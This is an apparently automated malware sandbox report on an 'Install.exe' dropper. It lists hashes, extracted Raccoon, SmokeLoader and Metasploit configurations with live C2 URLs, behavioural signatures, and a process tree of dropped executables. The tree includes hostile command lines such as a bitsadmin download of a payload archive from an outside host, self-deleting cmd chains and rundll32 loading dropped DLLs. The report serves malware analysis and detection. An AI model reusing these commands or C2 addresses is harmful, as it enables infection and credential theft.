Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    1802s
  • max time network
    1564s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-04-2021 07:37

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 33 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1872
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2804
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2788
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2588
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2536
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1396
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1264
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1196
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1076
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:408
                    • C:\Users\Admin\AppData\Roaming\edrrfbi
                      C:\Users\Admin\AppData\Roaming\edrrfbi
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1124
                      • C:\Users\Admin\AppData\Roaming\edrrfbi
                        C:\Users\Admin\AppData\Roaming\edrrfbi
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5284
                    • C:\Users\Admin\AppData\Roaming\burrfbi
                      C:\Users\Admin\AppData\Roaming\burrfbi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3100
                    • C:\Users\Admin\AppData\Roaming\edrrfbi
                      C:\Users\Admin\AppData\Roaming\edrrfbi
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:908
                      • C:\Users\Admin\AppData\Roaming\edrrfbi
                        C:\Users\Admin\AppData\Roaming\edrrfbi
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4732
                    • C:\Users\Admin\AppData\Roaming\burrfbi
                      C:\Users\Admin\AppData\Roaming\burrfbi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4572
                    • C:\Users\Admin\AppData\Roaming\edrrfbi
                      C:\Users\Admin\AppData\Roaming\edrrfbi
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4224
                      • C:\Users\Admin\AppData\Roaming\edrrfbi
                        C:\Users\Admin\AppData\Roaming\edrrfbi
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:1028
                    • C:\Users\Admin\AppData\Roaming\burrfbi
                      C:\Users\Admin\AppData\Roaming\burrfbi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:4708
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll",DlRhNcvOzN
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:3868
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:740
                      • C:\Users\Admin\AppData\Local\Temp\is-E9EUQ.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-E9EUQ.tmp\Install.tmp" /SL5="$90048,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3968
                        • C:\Users\Admin\AppData\Local\Temp\is-U3Q32.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-U3Q32.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:580
                          • C:\Program Files\Java\VJKGTBXMWJ\ultramediaburner.exe
                            "C:\Program Files\Java\VJKGTBXMWJ\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3744
                            • C:\Users\Admin\AppData\Local\Temp\is-INL23.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-INL23.tmp\ultramediaburner.tmp" /SL5="$40030,281924,62464,C:\Program Files\Java\VJKGTBXMWJ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:1604
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:3936
                          • C:\Users\Admin\AppData\Local\Temp\84-b9e79-ad7-94caf-50f0200de9bba\Bilukytega.exe
                            "C:\Users\Admin\AppData\Local\Temp\84-b9e79-ad7-94caf-50f0200de9bba\Bilukytega.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3592
                          • C:\Users\Admin\AppData\Local\Temp\18-4fc07-c8d-3febd-ae52beca307db\Fuvubytapu.exe
                            "C:\Users\Admin\AppData\Local\Temp\18-4fc07-c8d-3febd-ae52beca307db\Fuvubytapu.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2324
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c5awez21.jg2\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4144
                              • C:\Users\Admin\AppData\Local\Temp\c5awez21.jg2\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\c5awez21.jg2\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4308
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gxwzhxsw.qlo\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4492
                              • C:\Users\Admin\AppData\Local\Temp\gxwzhxsw.qlo\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\gxwzhxsw.qlo\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:4676
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:4864
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fugdmdnq.utj\md1_1eaf.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4952
                              • C:\Users\Admin\AppData\Local\Temp\fugdmdnq.utj\md1_1eaf.exe
                                C:\Users\Admin\AppData\Local\Temp\fugdmdnq.utj\md1_1eaf.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:4860
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cvacb2ot.gzg\y1.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4612
                              • C:\Users\Admin\AppData\Local\Temp\cvacb2ot.gzg\y1.exe
                                C:\Users\Admin\AppData\Local\Temp\cvacb2ot.gzg\y1.exe
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2812
                                • C:\Users\Admin\AppData\Local\Temp\yaVIc95kmZ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\yaVIc95kmZ.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:5788
                                  • C:\Users\Admin\AppData\Roaming\1619343310453.exe
                                    "C:\Users\Admin\AppData\Roaming\1619343310453.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619343310453.txt"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5268
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\yaVIc95kmZ.exe"
                                    8⤵
                                      PID:5140
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 127.0.0.1 -n 3
                                        9⤵
                                        • Runs ping.exe
                                        PID:4684
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cvacb2ot.gzg\y1.exe"
                                    7⤵
                                      PID:5604
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        8⤵
                                        • Delays execution with timeout.exe
                                        PID:5536
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0qz4gxel.b2q\askinstall39.exe & exit
                                  5⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3140
                                  • C:\Users\Admin\AppData\Local\Temp\0qz4gxel.b2q\askinstall39.exe
                                    C:\Users\Admin\AppData\Local\Temp\0qz4gxel.b2q\askinstall39.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:4812
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      7⤵
                                        PID:4152
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          8⤵
                                          • Kills process with taskkill
                                          PID:5188
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojkv2ory.r03\inst.exe & exit
                                    5⤵
                                      PID:4940
                                      • C:\Users\Admin\AppData\Local\Temp\ojkv2ory.r03\inst.exe
                                        C:\Users\Admin\AppData\Local\Temp\ojkv2ory.r03\inst.exe
                                        6⤵
                                        • Executes dropped EXE
                                        PID:3840
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2a0nfjpq.oek\SunLabsPlayer.exe /S & exit
                                      5⤵
                                        PID:4532
                                        • C:\Users\Admin\AppData\Local\Temp\2a0nfjpq.oek\SunLabsPlayer.exe
                                          C:\Users\Admin\AppData\Local\Temp\2a0nfjpq.oek\SunLabsPlayer.exe /S
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          PID:1096
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5816
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5728
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5368
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5332
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5648
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5848
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                            PID:4940
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5304
                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                            7⤵
                                                            • Download via BitsAdmin
                                                            PID:1296
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPPviIyAEhz2BJi1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:5296
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pP4sJ2Xts2O9yQyZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4288
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              8⤵
                                                                PID:5604
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:6008
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5652
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5824
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5804
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:1488
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll" DlRhNcvOzN
                                                                        7⤵
                                                                        • Loads dropped DLL
                                                                        • Checks for any installed AV software in registry
                                                                        PID:5304
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll" DlRhNcvOzN
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in System32 directory
                                                                          PID:4368
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:5780
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:2296
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5016
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:3952
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrFC1B.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:4216
                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:5052
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4tfiln3h.1mc\GcleanerWW.exe /mixone & exit
                                                                              5⤵
                                                                                PID:196
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\askzo0t2.4qx\toolspab1.exe & exit
                                                                                5⤵
                                                                                  PID:5332
                                                                                  • C:\Users\Admin\AppData\Local\Temp\askzo0t2.4qx\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\askzo0t2.4qx\toolspab1.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5472
                                                                                    • C:\Users\Admin\AppData\Local\Temp\askzo0t2.4qx\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\askzo0t2.4qx\toolspab1.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:6068
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oiojrkhc.tse\c7ae36fa.exe & exit
                                                                                  5⤵
                                                                                    PID:5568
                                                                                    • C:\Users\Admin\AppData\Local\Temp\oiojrkhc.tse\c7ae36fa.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\oiojrkhc.tse\c7ae36fa.exe
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5800
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kiywib3s.joz\app.exe /8-2222 & exit
                                                                                    5⤵
                                                                                      PID:5712
                                                                                      • C:\Users\Admin\AppData\Local\Temp\kiywib3s.joz\app.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\kiywib3s.joz\app.exe /8-2222
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5988
                                                                                        • C:\Users\Admin\AppData\Local\Temp\kiywib3s.joz\app.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\kiywib3s.joz\app.exe" /8-2222
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:5632
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                              1⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:492
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Checks processor information in registry
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:5068
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:1600
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              PID:4332
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4348
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4644
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                              1⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:4736
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:5688
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe
                                                                                1⤵
                                                                                  PID:6060
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                  1⤵
                                                                                    PID:5188
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2184
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:4344
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5784
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:4048
